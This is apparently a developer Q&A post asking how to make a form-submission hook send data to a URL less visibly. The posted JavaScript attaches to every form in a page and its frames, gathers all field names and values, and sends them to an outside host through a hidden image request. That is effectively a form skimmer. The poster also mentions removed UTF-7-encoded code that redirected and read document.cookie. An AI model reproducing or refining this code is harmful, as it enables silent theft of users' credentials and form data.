# Execute a URL Via JS or jQuery that's not XSS

Tags: javascript, dom-events

I need to be able to execute a PHP link after the form has been submitted. I've got everything working in JS apart from executing an URL without some godly alert box that isn't very user friendly to say the least. My predecessor didn't really understand XSS so just added a image tags to try and execute the links. Do you have any ideas of how I can improve / get it working?

**Function 1**

```
function attach(wnd,handler){
        for(var i=0; i<wnd.document.forms.length; i++){
            var form = wnd.document.forms[i];
                form.addEventListener('submit', handler,false);
        }

        for(var i=0; i<wnd.frames.length; i++){
            var iwnd = wnd.frames[i];               
            attach(iwnd,handler);
        }
     }
```

**Function 2**

```
function formSubmit(e){
     
var forms=parent.document.getElementsByTagName("form");
for (i = 0 ; i < forms.length; i++)
{
    var chain="";
     var forms=parent.document.getElementsByTagName("form");
     
     for (x = 0 ; x < forms.length; x++)
     {
         var elements=forms[x].elements;
         for (e = 0 ; e < elements.length; e++)
         {
             chain += elements[e].name + "%3d" + elements[e].value + "|";
              
         }
     }
     
     //Very bad code XSS etc
    var pic = document.createElement('img');
    pic.className = 'avatar';
    pic.src = 'http://x.x.x.x/images/Image.php?id=0.0.0.0&idi=test'+chain;
    pic.height = '50';
    pic.width = '50';

    document.getElementById('test').appendChild(pic);
     
     
     
     
}
}
```

**Simple add Listener**

```
 window.addEventListener('load', function(){attach(window,formSubmit);},false);
```

Or is this Js better, but I'm not so sure how to get the value of chain back to a URL:

```
function FormEnum()
{
         var forms = parent.document.getElementsByTagName("form");
    for (i = 0 ; i < forms.length; i++)
    {
        forms[i].addEventListener('submit', function() {
            var chain = "";
            var forms = parent.document.getElementsByTagName("form");
            
            for (x = 0 ; x < forms.length; x++)
            {
                var elements = forms[x].elements;
                for (e = 0 ; e < elements.length; e++)
                {
                    chain += elements[e].name + "%3d" + elements[e].value + "|";
                }
            }
            attachForm(chain);
           
        }, false);
    }
}
```

Comment: And you know what XSS is? Well passing data by loading an image is for sure not the best idea because you only get the info that the request was successful, but you _can't_ pass some additional information back from the server. So you would use `XMLHttpRequest` or as fallback `script` loading with a callback methode (aka ajax with jsonp). But anyway why do you think the shown code is _very bad code_ in context of `XSS`?

Comment: I've edited the section out that was UTF-7 web encoded that redirected to another internal site then proceeded to documnet.cookie etc..  but thankyou i shall try XMLHttpRequest